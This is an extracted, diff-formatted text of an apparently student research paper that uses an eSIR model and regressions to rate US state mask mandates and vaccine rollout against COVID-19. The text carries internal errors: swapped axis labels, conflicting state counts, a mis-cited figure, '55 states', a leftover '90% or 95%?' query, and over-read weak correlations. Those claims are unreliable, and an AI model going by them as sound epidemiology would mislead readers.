+ compare the decrease in real-time reproduction number
52
+ after the policy is issued among different countries to
53
+ see which country performs best for a specific policy.
54
+ In this study we used an eSIR model, extended state-
55
+ space SIR models [10], to predict a one-month daily
56
+ infection proportion after a period of lagging time and
57
+ compare this to the actual daily infection proportion to
58
+ measure the effectiveness policy.
59
+ Then, we conducted multivariate and single variate
60
+ linear regression models, to study the correlation
61
+ between policy effective rate and different potential
62
+ factors, such as economics, population density,
63
+ education level, etc. The results from this study can
64
+ serve as a reference for governments when issuing covid
65
+ polices
66
+ 2. DATA
67
+
68
+
69
+
70
+
71
+ We obtained COVID data from the website
72
+ covidtracking.com and the website collected and
73
+ published the most complete data about COVID-19 in
74
+ the US, including the daily death, cases, and
75
+ hospitalization, etc.[11] This data source started
76
+ collecting daily recovery rates, which are essential for
77
+ the eSIR model prediction, in March 2020.
78
+ Additionally, they are no longer collecting data as of
79
+ March 7, 2021. Thus, the data used in this analysis are
80
+ from March 2020 to March 2021.
81
+ We obtained data for the exact time when a policy
82
+ was issued in each state from ballotpedia.org, which
83
+ provides a detailed policy timeline for each state. [12]
84
+ Data for policy effectiveness's potential factors are
85
+ collected from various resources [13-21].
86
+ 3. METHOD
87
+ We
88
+ used
89
+ the
90
+ extended
91
+ state-space
92
+ SIR
93
+ epidemiological model (eSIR)[10], to estimate the
94
+ effectiveness
95
+ of
96
+ different
97
+ policies
98
+ and
99
+ vaccine
100
+ interventions on Covid-19. It uses the susceptible,
101
+ infection, and removed as the input variables to predict
102
+ the daily proportion of infection and proportion of death
103
+ for a given amount of time. This approach has also been
104
+ used during SARS.
105
+ The given dataset updated the cumulative recovered
106
+ data every 7 days. To prevent the huge increase in
107
+ recovered data every 7 days from impacting the model
108
+ prediction, we use the loess.as() function under package
109
+ (fANCOVA) to fit a smooth curve between all the
110
+ recovered data. This function can choose a span value,
111
+ the parameter α which controls the degree of smoothing,
112
+ that optimizes the fit of the LOESS curve by fitting a
113
+ LOESS regression and automates the parameter selection
114
+ process.[22] The smoothed recovered data was used for
115
+ the rest of our analysis.
116
+ We first tested the prediction ability of eSIR model
117
+ by setting a day when there was no major policy or
118
+ vaccine issued 30 days before and after as the first
119
+ prediction date and predict the daily infection proportion
120
+ for the following 30 days. The eSIR model output an
121
+ graph with infection proportion as the y axis, and date as
122
+ x axis. It also includes two curves, one of which is the
123
+ actual daily infection proportion and the other represents
124
+ the predicted daily infection curved. The predicted curve
125
+ is based on the medium values of predicted interval from
126
+ eSIR model, since mediums are not affected by the
127
+ outliers. Then, we compared the prediction curve and the
128
+ actual daily infection proportion to see if the model can
129
+ make accurate prediction on daily infection proportion
130
+ when there was no policy and vaccine to interfere the
131
+ result. We also compute the 90% or 95%? confidence
132
+ interval.
133
+ For the policy intervention, we set the first prediction
134
+ date 14 days after the policy was issued, because we
135
+ assume that a 14-days lag time for counts of cases to
136
+ coincide with the approximate incubation period of
137
+ COVID-19.[6] While for the vaccine, according to CDC,
138
+ the vaccine will be effective 14 days after the first shot,
139
+ and we also set a 14-day lag time for vaccine. Thus, we
140
+ set the first prediction date 28 days after the first shot.
141
+ [23]
142
+ The effectiveness of policy intervention and vaccine
143
+ is defined as the policy effective rate which is measured
144
+ by the infection proportion prediction minus actual
145
+ infection proportion and dived by of actual infection
146
+ proportion. We calculated the daily policy effective rate
147
+ and define the largest value among all 31 prediction days
148
+ as max policy effective rate. We also calculate the sum of
149
+ infection proportion prediction minus the sum of actual
150
+ infection proportion and dived by the sum of actual
151
+ infection proportion and defined it as the total policy
152
+ effectiveness rate.
153
+ We use the total policy effective rate and max policy
154
+ effective rate as measurements to compare the
155
+ effectiveness of certain policies between states.
156
+ Additionally,
157
+ we
158
+ applied
159
+ Inverse-normal
160
+ transformation to both the total policy effective rate and
161
+ max policy effective rate. Then, we test the multivariate
162
+ linear model to figure out which factor has a significant
163
+ impact on the effectiveness of each policy. We test
164
+ factors such as public health funding per person, number
165
+ of hospital beds per 1000 people, and GDP per capita,
166
+ etc. Since we only have 21 or 28 states available for each
167
+ policy, we set the level of significance as 0.1. We also
168
+ conducted a single variate linear model between the max
169
+ or total policy effective rate and each potential factor
170
+ since the significance of each potential may decrease in a
171
+ multivariate linear regression model because of
172
+ collinearity between factors. The level of significance, in
173
+ this case, was still set to be 0.1. We studied which factors
174
+ significantly impact max or total policy effective rate
175
+ based on the results from multivariate and single variate
176
+ linear regression model results.
177
+ 4. RESULT
178
+ 4.1. MODEL EFFICIENCY:
179
+ The estimated daily infected proportion for state
180
+ Alabama from 06/21/20 to 07/21/20 is based on the daily
181
+ infection proportion from 05/22/20 to 06/21/20 as shown
182
+ in figure 1. The horizontal axis displays the date
183
+ month/day/year, and the vertical axis displays the
184
+ proportion of infected. The green dotted line represents
185
+ the actual daily infection proportion, while the red line
186
+ represents the predicted values. The red range represents
187
+ the confidence interval. The figure shows that the
188
+ predicted daily infected rate is similar to the actual one
189
+
190
+
191
+
192
+
193
+ and all the actual values fall in the 95% confidence
194
+ interval. We applied the same method to all 26 states and
195
+ get similar results. Thus we conclude that the eSIR is
196
+ efficient in predicting accurate daily infection proportion
197
+ when there is no policy interfered for all 26 states.
198
+
199
+
200
+ Figure 1. Model Effectiveness Test figure. The x-
201
+ axis represents infection proportion and the y-axis
202
+ represents the date. The blue vertical line indicates the
203
+ first prediction day, while the green line indicates the
204
+ last prediction day. The green dot curve represents the
205
+ actual daily infection proportion. The red line represents
206
+ the predicted infected curve measured by the eSIR
207
+ model with medians as the predicted value.
208
+ 4.2. THE MASK PLOT:
209
+ Figure 2 shows the predicted daily infected
210
+ proportion for Alabama 14 days after the state-wide
211
+ Mask policy was issued on 07/01/2020. The elements in
212
+ the graph are the same as Figure 1. Figure 2 indicates that
213
+ the predicted line is first lower than the actual value
214
+ curve, but slowly catch up and pass over the actual value
215
+ curve around the middle, and finally becomes much
216
+ larger than the actual value curve, which indicates that
217
+ the mask policy effect starts to show after a period of
218
+ extra lagging time and the effect is significant.
219
+ We apply the same method to the states that have data
220
+ available for the tested period and had issued a state-wide
221
+ mask policy, which is 19 states in total. The mask policy
222
+ plots have many variations among states. Most of the
223
+ states, such as New Mexico, show an immediate decrease
224
+ in the actual values curve compared to the predicted
225
+ curve, which indicates that the mask policy has started to
226
+ impact daily infected proportion after 14 days for the
227
+ policy lagging period. Some of the states, such as
228
+ Arkansas, show a similar pattern to Alabama mask
229
+ policy, which shows impact after a short period of
230
+ lagging. However, we also have some states, such as
231
+ Vermont, which show no difference between the
232
+ predicted curve and actual curve and thus show no impact
233
+ for the mask policy. Also, some states, such as Michigan,
234
+ indicate an opposite result, in which the predicted curve
235
+ is smaller than the actual curve.
236
+
237
+ Figure 2. Mask Policy effectiveness figure. The x-axis
238
+ represents infection proportion and the y-axis represents
239
+ the date. The blue vertical line indicates the first
240
+ prediction day, which is 14 days after the mask policy is
241
+ issued, while the green line indicates the last prediction
242
+ day. The green dot curve represents the actual daily
243
+ infection proportion. The red line represents the
244
+ predicted infected curve measured by the eSIR model
245
+ with medians as the predicted value.
246
+ 4.3. THE VACCINE PLOT:
247
+ Figure 3 shows the predicted daily infected
248
+ proportion for Alabama 28 days after the Covid vaccine
249
+ was first distributed 12/01/2020 for all states. The
250
+ elements in the graph are the same as Figure 1 and
251
+ Figure 2. Figure 2 indicates that the predicted curve is
252
+ larger than the actual curve on the first day of the
253
+ prediction and the difference kept increasing as time
254
+ goes, which indicates that vaccine policy immediately
255
+ shows an impact on daily infected proportion after 28
256
+ days of lagging.
257
+ We apply the same method to all the states that have
258
+ data available for the test, which is in 26 states in total.
259
+ The vaccine policy plots have much fewer variations
260
+ among states compared to the mask policy. Most of the
261
+ states, such as West Virginia, have a similar pattern as
262
+ Alabama, which indicates that the mask policy has
263
+ started to impact daily infected proportion. Some of the
264
+ states, such as South Carolina, show impact after a short
265
+ period of lagging. However, we also have some states,
266
+ such as Maryland, which shows no difference between
267
+ the predicted curve and actual curve and thus show not
268
+ impact for the vaccine policy. Also, some states, such as
269
+ Texas, indicate an opposite result, in which the
270
+ predicted curve is smaller than the actual curve.
271
+
272
+
273
+ Posteriorβ,=0.0606,Yp=0.0267and Ro=2.42
274
+ 0.016
275
+ 0.012
276
+ P(Infected)
277
+ Jul22
278
+ 0.008
279
+ Jun21
280
+ 0.004
281
+ 05/22/20
282
+ 06/21/20
283
+ 07/21/20
284
+ timePosteriorβ,=0.0593,Yp=0.0236andRo=2.64
285
+ 0.03
286
+ P(Infected)
287
+ 0.02
288
+ Aug15
289
+ Jul 15
290
+ 0.01
291
+ 000000
292
+ 06/15/20
293
+ 07/15/20
294
+ 08/14/20
295
+ time
296
+
297
+
298
+
299
+ Figure 3. Vaccine Policy Effectiveness Test figure.
300
+ The x-axis represents infection proportion and the y-axis
301
+ represents the date. The blue vertical line indicates the
302
+ first prediction day, which is also 28 days after the
303
+ vaccine is distributed, while the green line indicates the
304
+ last prediction day. The green dot curve represents the
305
+ actual daily infection proportion. The red line represents
306
+ the predicted infected curve measured by the eSIR
307
+ model with medians as the predicted value.
308
+ 4.3 TOTAL POLICY EFFECTIVE RATE
309
+ The figure 4 shows the total policy effective rate and
310
+ max policy effective rate of each state. The x-axis shows
311
+ the state, and the y axis shows the total policy effective
312
+ rate. The blue bars show the total policy effective rate for
313
+ mask policy; the orange bars show the total policy
314
+ effective rate for the vaccine; the grey bars show the max
315
+ policy effective rate for mask policy, the yellow bars
316
+ show the max policy effective rate for the vaccine. It is
317
+ ordered by the total policy effective rate because all 26
318
+ states have distributed vaccines. All the states in figure
319
+ 4 distributed vaccines state-wide, while only 21 of them
320
+ have issued mask policy and have data available for
321
+ analysis. (Oklahoma has not issued a state-wide mask
322
+ policy, and other states do not have recovery data
323
+ available for analysis.)
324
+ In figure 4, we notice that the results for the total
325
+ policy effective rate are consistent with the ones for the
326
+ max policy effective rate. However, the total policy
327
+ effective rates for mask policy tend to have more negative
328
+ values, while the max policy effective rates for mask
329
+ policy tend to have more extreme high values. It is
330
+ because, in most of these states, the prediction curve
331
+ increases much more quickly than the actual curve, which
332
+ leads to a huge gap on the last day of prediction.
333
+ Additionally, the states with a high mask policy effective
334
+ rate also tend to have a high vaccine policy effective rate.
335
+ This applies to both the total policy effective rate and the
336
+ max policy effective rate. The correlation between mask
337
+ total policy effective rate and vaccine total policy
338
+ effective rate is 0.556. The correlation between mask
339
+ max policy effective rate and vaccine max policy
340
+ effective rate is 0.496. Both are high enough to be
341
+ considered as a high correlation.
342
+
343
+ Figure 4. Vaccine Policy Effectiveness Test
344
+ figure. The x-axis represents the states and the
345
+ y-axis represents the date. The blue bars show
346
+ the total policy effective rate for mask policy;
347
+ the orange bars show the total policy effective
348
+ rate for the vaccine; the grey bars show the max
349
+ policy effective rate for mask policy, the yellow
350
+ bars show the max policy effective rate for the
351
+ vaccine.
352
+ 4.4 FIND FACTORS THAT AFFECT
353
+ POLICY EFFECTIVE RATE BASED ON
354
+ LINEAR REGRESSION MODEL
355
+ Based on the result above, we notice the
356
+ variation within total and max policy effective rate
357
+ between the states. We want to explore more about
358
+ what factors lead to the difference in policy
359
+ effectiveness among states. We use the
360
+ multivariate linear model and single variate linear
361
+ model to explore the impact of different potential
362
+ factors.
363
+ 4.4.1
364
+ MULTIVARIATE LINEAR
365
+ REGRESSION MODEL BETWEEN
366
+ POLICY EFFECTIVE RATE
367
+ DIFFERENT FACTORS
368
+ In table 1, we include two factors with the least low p-
369
+ value in each policy effective rate’s multivariate linear
370
+ model. The corresponding estimated coefficient and p
371
+ values are also listed in the table. All tables that include
372
+ the estimated coefficient, standard errors, test statistics,
373
+ and p values for each factor in each policy effective rate’s
374
+ multivariate linear model are in the appendix. It also
375
+ shows the R squared value of the multivariate linear
376
+ model of each policy effective rate.
377
+ -1
378
+ 0
379
+ 1
380
+ 2
381
+ 3
382
+ 4
383
+ 5
384
+ 6
385
+ 7
386
+ 8
387
+ 9
388
+ TX
389
+ MD
390
+ KY
391
+ MI
392
+ WI
393
+ SC
394
+ OH
395
+ NE
396
+ AK
397
+ PA
398
+ NM
399
+ MA
400
+ utah
401
+ MT
402
+ MA
403
+ MS
404
+ VT
405
+ WY
406
+ LA
407
+ SD
408
+ OK
409
+ NH
410
+ WV
411
+ AR
412
+ ND
413
+ TN
414
+ Policy Effective Rate
415
+ State
416
+ Mask
417
+ Vaccine
418
+ mask_max
419
+ vaccine_max
420
+
421
+ Posteriorβp=0.0283,Yp=0.00994 andRo=2.96
422
+ 0.07
423
+ 0.06
424
+ P(Infected)
425
+ 0.05
426
+ Feb10
427
+ 0.04
428
+ Jan 11
429
+ 0.03-
430
+ 0.02
431
+ 12/11/20
432
+ 01/10/21
433
+ 02/09/21
434
+ time
435
+
436
+
437
+ In mask total policy effective rate and max policy
438
+ effective rate multivariate linear models, only the
439
+ population density is smaller than the level of
440
+ significance, which indicates that public health per
441
+ person has the most significant impact on the
442
+ effectiveness of mask policy. Besides population density,
443
+ the percent of the population over 65 also has a p-value
444
+ relatively close to the level of significance.
445
+ In vaccine total policy effective rate and max policy
446
+ effective rate multivariate linear models, only the public
447
+ health funding per person has a p-value less than the level
448
+ of significance 0.1, which indicates that public health per
449
+ person has the most significant impact on the
450
+ effectiveness of vaccine policy. Besides public health
451
+ funding per person, immigration also has a relatively low
452
+ p-value.
453
+
454
+ The R squared of the multivariate linear model for the
455
+ max mask, total mask, and max vaccine policy effective
456
+ rate are around 0.4. Although 0.4 is usually considered as
457
+ a low correlation for the linear regression model, our
458
+ dataset is so small that we still consider them as
459
+ significant correlation. Additionally, the R squared of the
460
+ multivariate linear model for the max mask for total
461
+ vaccine policy effective rate is above 0.7, which indicates
462
+ a strong correlation.
463
+
464
+ Table 1. Multivariate linear regression model. The
465
+ first column represents the type of policy effective rate
466
+ and R^2 value of its multivariate linear regression
467
+ model. The second column represents the two most
468
+ significant factors for each policy effective factor
469
+ according to its multivariate linear regression model.
470
+ The third and fourth columns represent each factor’s
471
+ estimated coefficient and p-value.
472
+ 4.4.2
473
+ SINGLE VARIATE LINEAR
474
+ REGRESSION MODEL BETWEEN
475
+ POLICY EFFECTIVE RATE
476
+ DIFFERENT FACTORS
477
+ Table 2 shows all the factors that have a p-value less
478
+ than 0.1 level of significance for each policy effective
479
+ rate. It also includes the estimated coefficient and p-value
480
+ of each factor.
481
+ For mask policy effective rate, we have population
482
+ density, voters in each state predominantly choose either
483
+ the Republican Party or Democratic Party, the number of
484
+ hospital beds per 1000 people, and percent of the
485
+ population over 65 have the most important impact on the
486
+ effectiveness of mask policy.
487
+ For vaccine policy effective rate, we have percent of
488
+ immigration in each state, the number of hospital beds
489
+ per 1000 people, and public health funding per person
490
+ have the most important impact on the effectiveness of
491
+ mask policy.
492
+
493
+ Table 2. Single variate linear regression model. The
494
+ first column represents the type of policy effective. The
495
+ second column represents factors with p-value less than
496
+ 0.1 for each policy effective factor according to its
497
+ multivariate linear regression model. The third and
498
+ fourth columns represent each factor’s estimated
499
+ coefficient and p-value.
500
+ 5 DISCUSSION
501
+ Based on the two tables above, we conclude that
502
+ population density and percent of the population over 65
503
+ have a negative impact on the mask policy effective rate.
504
+ According to CDC, transmission can be reduced by up to
505
+ 96.5% if both an infected person and an uninfected
506
+ person wear tightly fitted surgical masks or a cloth mask
507
+ together with a surgical mask. [25] However, unlike
508
+ surgical masks, cloth masks’ ability to block transmission
509
+ is highly variable due to their design, fit, and materials
510
+ used [26]. Thus, it is possible that the spreading of covid-
511
+ 19 will be efficiently reduced with low population
512
+ density even only cloth masks are used, but with high
513
+ population density, cloth masks may not decrease the
514
+ spreading of covid 19 very efficiently, due to their lower
515
+ blocking rate. For the negative impact from percent of the
516
+ population over 65, it is possibly because old people on
517
+ average require more time to recover from Covid-19 [27]
518
+ and thus have a much longer period of hospitalization. A
519
+ higher old population percent means more proportion of
520
+ the infected population will also be old people. Since the
521
+ infection proportion is calculated by the total infected
522
+ population minus the removed population (removed and
523
+ recovered population), longer hospitalization for the
524
+ elder population will result in a smaller removed
525
+ population and thus a larger infection proportion and
526
+ lower policy effective rate.
527
+ However, voters in each state predominantly choose
528
+ Republican Party, and the number of hospital beds per
529
+ 1000 people have a positive impact on the mask policy
530
+ effective rate. Most of the states first issued their mask
531
+
532
+ policy.effective.rate
533
+ factor
534
+ estimate
535
+ p.value
536
+ max mask (R^2 = 0.3922)
537
+ population density
538
+ -0.00386
539
+ 0.1373
540
+ hospital bed
541
+ 0.4765
542
+ 0.4977
543
+ totalmask (R^2=0.4786)
544
+ population density
545
+ -0.003272
546
+ 0.07596
547
+ precent of population over 65
548
+ -0.2287
549
+ 0.1074
550
+ max vaccine (R~2 = 0.4365)
551
+ public health
552
+ 0.02445
553
+ 0.07203
554
+ immigration
555
+ -0.09829
556
+ 0.334
557
+ total vaccine (R*2 = 0.7319)
558
+ public health
559
+ 0.02914
560
+ 0.02472
561
+ immigration
562
+ -0.1154
563
+ 0.2248policy.effective.rate
564
+ factor
565
+ estimate
566
+ p.value
567
+ max mask
568
+ population density
569
+ -0.003014
570
+ 0.0572
571
+ politics (R)
572
+ 0.8419
573
+ 0.0857
574
+ hospital bed
575
+ 0.5753
576
+ 0.0591
577
+ total mask
578
+ population density
579
+ -0.003032
580
+ 0.0555
581
+ politics (R)
582
+ 1.093
583
+ 0.0208
584
+ percent of population over 65
585
+ -0.2527
586
+ 0.0182
587
+ hospita bed
588
+ 0.5235
589
+ 0.0889
590
+ max vaccine
591
+ immigration
592
+ -0.08807
593
+ 0.0529
594
+ hospital bed
595
+ 0.5426
596
+ 0.0332
597
+ total vaccine
598
+ immigration
599
+ -0.1027
600
+ 0.0218
601
+ hospital bed
602
+ 0.556
603
+ 0.0286
604
+ public health
605
+ 0.02024
606
+ 0.0547
607
+
608
+
609
+ policy during July when Republican-led states had a
610
+ higher positive-testing and COVID-19 case diagnoses
611
+ than democracy-led states overall. [28] Thus, higher
612
+ infection proportion before mask policy is issued might
613
+ at least partially explain why Republican-led states have
614
+ a larger gap between prediction curve and actual curve
615
+ have which leads to a higher effective rate. With the
616
+ decrease in infection, states with a larger number of
617
+ hospital beds per 1000 people will be recovered from
618
+ 111e. Thus, these states have a higher mask policy
619
+ effective rate.
620
+ For vaccine policy effective rate, the number of
621
+ hospital beds per 1000 people and public health funding
622
+ per person have a positive impact on it. The positive
623
+ impact from the number of hospital beds per 1000 people
624
+ will be likely due to similar reasons above. Additionally,
625
+ vaccination will mitigate the symptom and recovery time.
626
+ States with higher public health funding per person will
627
+ be more likely to distribute the vaccine better, as they
628
+ may have more vaccines available overall, so they have a
629
+ higher vaccine policy effective rate. However, percent of
630
+ immigration has a negative impact on the vaccine policy
631
+ effective rate. A possible reason for that is vaccine sites
632
+ across the U.S. require some form of identification, a
633
+ requirement that many undocumented immigrates do not
634
+ have, so the vaccine is less efficient for states with a
635
+ higher immigration population. [29]
636
+ 6 CONCLUSION
637
+ The current research was designed to examine the
638
+ effectiveness of different policies. Significant differences
639
+ in policy effective rates of the same policy for different
640
+ states have been identified. Several reasons may help
641
+ interpret these findings such as the positive impact from
642
+ the number of hospital beds per 1000 people, public
643
+ health funding per person, and a negative impact from
644
+ percent of immigration for vaccine policy effective rate;
645
+ additionally, the positive impact from the number of
646
+ voters in each state predominantly choosing Republican
647
+ Party, and the number of hospital beds per 1000 people,
648
+ and a negative impact from population density and
649
+ percent of the population over 65 for mask policy
650
+ effective rate.
651
+ This research uses a new method to sheds light on the
652
+ difference in policy effective rate between states of the
653
+ same policy and the correlation between policy effective
654
+ rate and different factors. It can be served as a reference
655
+ for future covid policy.
656
+ Due to the lack of enough data, this research only
657
+ includes 26 states for vaccine policy and 19 states for
658
+ mask policy, which negatively affects the significance of
659
+ all the potential factors. If the data for all 55 states are
660
+ available, the linear model will be improved, and it is
661
+ more likely to find more significant factors that impact
662
+ the policy effective rate. Also, the prediction curve in this
663
+ research is based on the eSIR model. Although it has been
664
+ proved to be an effective model for predicting short-
665
+ range infection proportion, the prediction is not a hundred
666
+ percent accurate. It is still possible that the difference
667
+ between the prediction curve and the actual curve is
668
+ partly due to the uncorrected prediction by the eSIR
669
+ model. The results will be more promising if a linear
670
+ regression model is applied to the change in real-time
671
+ reproduction
672
+ number
673
+ and
674
+ get
675
+ similar
676
+ results.
677
+ Additionally, this research only computed the policy
678
+ effective rate based on infection proportion. However,
679
+ the vaccine has also been proved to reduce the death rate,
680
+ so redoing all the processes based on death proportion is
681
+ a possible choice for future research.
682
+ REFERENCES
683
+
684
+ [1]
685
+ Johns Hopkins Coronavirus Resource Center.
686
+ (n.d.). Covid-19 United States cases by county.
687
+ COVID-19 United States Cases by County.
688
+ Retrieved
689
+ October
690
+ 28,
691
+ 2021,
692
+ from
693
+ https://coronavirus.jhu.edu/us-map..
694
+ [2]
695
+ Wu J, Xu F, Zhou W, Feikin DR, Lin CY, He X,
696
+ Zhu Z, Liang W, Chin DP, Schuchat A. Risk factors
697
+ for SARS among persons without known contact
698
+ with SARS patients, Beijing, China. Emerg Infect
699
+ Dis.
700
+ 2004
701
+ Feb;10(2):210-6.
702
+ doi:
703
+ 10.3201/eid1002.030730.
704
+ PMID:
705
+ 15030685;
706
+ PMCID: PMC3322931.
707
+ [3]
708
+ Daghriri T, Ozmen O. Quantifying the Effects of
709
+ Social Distancing on the Spread of COVID-19. Int
710
+
711
+
712
+ J Environ Res Public Health. 2021 May
713
+ 23;18(11):5566.
714
+ doi:
715
+ 10.3390/ijerph18115566.
716
+ PMID: 34071047; PMCID: PMC8197116.
717
+ [4] Morgan Pincombe, Victoria Reese, Carrie B Dolan,
718
+ The effectiveness of national-level containment and
719
+ closure policies across income levels during the
720
+ COVID-19 pandemic: an analysis of 113 countries,
721
+ Health Policy and Planning, Volume 36, Issue 7,
722
+ August
723
+ 2021,
724
+ Pages
725
+ 1152–1162,
726
+ https://doi.org/10.1093/heapol/czab054.
727
+ [5] Rabail Chaudhry, George Dranitsaris, Talha
728
+ Mubashir, Justyna Bartoszko, Sheila Riazi, A
729
+ country level analysis measuring the impact of
730
+ government actions, country preparedness and
731
+
732
+
733
+
734
+
735
+ socioeconomic factors on COVID-19 mortality and
736
+ related
737
+ health
738
+ outcomes,
739
+ EClinicalMedicine,
740
+ Volume 25, 2020, 100464, ISSN 2589-5370,
741
+ https://doi.org/10.1016/j.eclinm.2020.100464Tools
742
+ , Entrepreneurship Research Journal, Published by
743
+ De Gruyter March 13, 2015.
744
+ [6] Liu S, Ermolieva T, Cao G, Chen G, Zheng X.
745
+ Analyzing
746
+ the
747
+ Effectiveness
748
+ of
749
+ COVID-19
750
+ Lockdown Policies Using the Time-Dependent
751
+ Reproduction
752
+ Number
753
+ and
754
+ the
755
+ Regression
756
+ Discontinuity Framework: Comparison between
757
+ Countries. Engineering Proceedings. 2021; 5(1):8.
758
+ https://doi.org/10.3390/engproc2021005008
759
+ [7] Inglesby TV. Public Health Measures and the
760
+ Reproduction Number of SARS-CoV-2. JAMA.
761
+ 2020;323(21):2186–2187.
762
+ doi:10.1001/jama.2020.7878.
763
+ [8] Arroyo-Marioli F, Bullano F, Kucinskas S,
764
+ Rondo ́n-Moreno C (2021) Tracking R of COVID-
765
+ 19: A new real-time estimation using the Kalman
766
+ filter. PLoS ONE 16(1): e0244474. https://doi.org/
767
+ 10.1371/journal.pone.0244474.
768
+ [9] Gostic KM, McGough L, Baskerville EB, et al.
769
+ Practical considerations for measuring the effective
770
+ reproductive number, Rt. Preprint. medRxiv.
771
+ 2020;2020.06.18.20134858. Published 2020 Aug
772
+ 28. doi:10.1101/2020.06.18.20134858.
773
+ [10] lilywang1988. (2019). Extended state-space sir
774
+ epidemiological
775
+ models.
776
+ GitHub.
777
+ Retrieved
778
+ November
779
+ 8,
780
+ 2021,
781
+ from
782
+ https://github.com/lilywang1988/eSIR.
783
+ [11] The Atlantic Monthly Group. (2021). The Data. The
784
+ COVID Tracking Project. Retrieved November 8,
785
+ 2021, from https://covidtracking.com/data.
786
+ [12] State-level mask requirements in response to the
787
+ coronavirus (COVID-19) pandemic, 2020-2021.
788
+ Ballotpedia. (n.d.). Retrieved November 9, 2021,
789
+ from
790
+ https://ballotpedia.org/State-
791
+ level_mask_requirements_in_response_to_the_cor
792
+ onavirus_(COVID-19)_pandemic,_2020-2021.
793
+ [13] For GDP by state, see "Gross domestic product
794
+ (GDP) by state (millions of current dollars)". Bureau
795
+ of Economic Analysis. Retrieved 8 June 2017.
796
+ [14] For population by state, see "Annual Estimates of
797
+ the Resident Population for the United States,
798
+ Regions, States, and Puerto Rico: April 1, 2010 to
799
+ July 1, 2016" (XLSX). United States Census
800
+ Bureau. Retrieved 8 June 2017.
801
+ [15] US NEWS. (n.d.). Most educated states 2021.
802
+ Retrieved
803
+ November
804
+ 8,
805
+ 2021,
806
+ from
807
+ https://worldpopulationreview.com/state-
808
+ rankings/most-educated-states.
809
+ [16] Wikimedia Foundation. (2021, October 14).
810
+ Political party strength in U.S. states. Wikipedia.
811
+ Retrieved
812
+ November
813
+ 8,
814
+ 2021,
815
+ from
816
+ https://en.wikipedia.org/wiki/Political_party_streng
817
+ th_in_U.S._states#cite_note-NJvoterreg-32.
818
+ [17] U.S. Census Bureau (2019). Nativity in the United
819
+ States American Community Survey 1-year
820
+ estimates. Retrieved from https://censusreporter.org
821
+ [18] Published by Statista Research Department, &amp;
822
+ 28, O. (2021, October 28). Senior population of the
823
+ U.S. by State 2019. Statista. Retrieved November 8,
824
+ 2021,
825
+ from
826
+ https://www.statista.com/statistics/736211/senior-
827
+ population-of-the-us-by-state/.
828
+ [19] KFF. (2021, April 5). Hospital beds per 1,000
829
+ population by ownership type. KFF. Retrieved
830
+ November
831
+ 8,
832
+ 2021,
833
+ from
834
+ https://www.kff.org/other/state-indicator/beds-by-
835
+ ownership/?currentTimeframe=0&amp;sortModel=
836
+ %7B%22colId%22%3A%22Location%22%2C%2
837
+ 2sort%22%3A%22asc%22%7D#notes.
838
+ [20] SHADAC analysis of [Per person state public health
839
+ funding], State Health Compare, SHADAC,
840
+ University
841
+ of
842
+ Minnesota,
843
+ statehealthcompare.shadac.org,
844
+ Accessed
845
+ [11/08/2021].
846
+ http://statehealthcompare.shadac.org/rank/117/per-
847
+ person-state-public-health-
848
+ funding#2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
849
+ ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,
850
+ 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5
851
+ 1,52/a/32/154/false/location
852
+ [21] Published by Statista Research Department, &amp;
853
+ 21, J. (2021, January 21). Population density in the
854
+ U.S., by State 2020. Statista. Retrieved November 8,
855
+ 2021,
856
+ from
857
+ https://www.statista.com/statistics/183588/populati
858
+ on-density-in-the-federal-states-of-the-us/.
859
+ [22] Wang, X., &amp; Ji, X. (2020, November 13).
860
+ Nonparametric analysis of covariance [R package
861
+ fANCOVA version 0.6-1]. The Comprehensive R
862
+ Archive Network. Retrieved November 10, 2021,
863
+ from
864
+ https://cran.r-
865
+ project.org/web/packages/fANCOVA/index.html.
866
+ [23] Kriss JL, Reynolds LE, Wang A, et al. COVID-19
867
+ Vaccine Second-Dose Completion and Interval
868
+ Between
869
+ First
870
+ and
871
+ Second
872
+ Doses
873
+ Among
874
+ Vaccinated Persons — United States, December 14,
875
+ 2020−February 14, 2021. MMWR Morb Mortal
876
+ Wkly
877
+ Rep
878
+ 2021;70:389–395.
879
+ DOI:
880
+
881
+
882
+
883
+
884
+ http://dx.doi.org/10.15585/mmwr.mm7011e2extern
885
+ al icon.
886
+ [24] Cori, A.; Ferguson, N.M.; Fraser, C.; Cauchemez, S.
887
+ A New Framework and Software to Estimate Time-
888
+ Varying Reproduction Numbers During Epidemics.
889
+ Am. J. Epidemiol. 2013, 178, 1505–1512.
890
+ [25] Rabin, R. C., & Stolberg, S. G. (2021, February 10).
891
+ The C.D.C. says tight-fit masks or double masking
892
+ with cloth and surgical masks increases protection.
893
+ The New York Times. Retrieved November 19,
894
+ 2021,
895
+ from
896
+ https://www.nytimes.com/2021/02/10/world/doubl
897
+ e-mask-protection-cdc.html.
898
+ [26] Brooks JT, Butler JC. Effectiveness of Mask
899
+ Wearing to Control Community Spread of SARS-
900
+ CoV-2.
901
+ JAMA.
902
+ 2021;325(10):998–999.
903
+ doi:10.1001/jama.2021.1505
904
+ [27] Voinsky I, Baristaite G, Gurwitz D. Effects of age
905
+ and sex on recovery from COVID-19: Analysis of
906
+ 5769 Israeli patients. J Infect. 2020;81(2):e102-
907
+ e103. doi:10.1016/j.jinf.2020.05.026
908
+ [28] Kempler , C. (2021, March 10). As cases spread
909
+ across U.S.. Last year, pattern emerged suggesting
910
+ link between governors' party affiliation and covid-
911
+ 19 case and death numbers. Johns Hopkins
912
+ Bloomberg School of Public Health. Retrieved
913
+ November
914
+ 19,
915
+ 2021,
916
+ from
917
+ https://publichealth.jhu.edu/2021/as-cases-spread-
918
+ across-us-last-year-pattern-emerged-suggesting-
919
+ link-between-governors-party-affiliation-and-
920
+ covid-19-case-and-death-numbers.
921
+ [29] 29. Semotiuk,
922
+ A.
923
+ J.
924
+ (2021,
925
+ September
926
+ 2).
927
+ Immigrants slow to get covid-19 vaccine as
928
+ impediments block their access. Forbes. Retrieved
929
+ November
930
+ 19,
931
+ 2021,
932
+ from
933
+ https://www.forbes.com/sites/andyjsemotiuk/2021/
934
+ 09/01/immigrants-slow-to-get-covid-19-vaccine-
935
+ as-impediments-block-their-
936
+ access/?sh=1aedc5ed5333.
937
+
938
+
939
+
KdE4T4oBgHgl3EQf7w5t/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
KdFRT4oBgHgl3EQf0zhG/content/tmp_files/2301.13654v1.pdf.txt ADDED
The diff for this file is too large to render. See raw diff
 
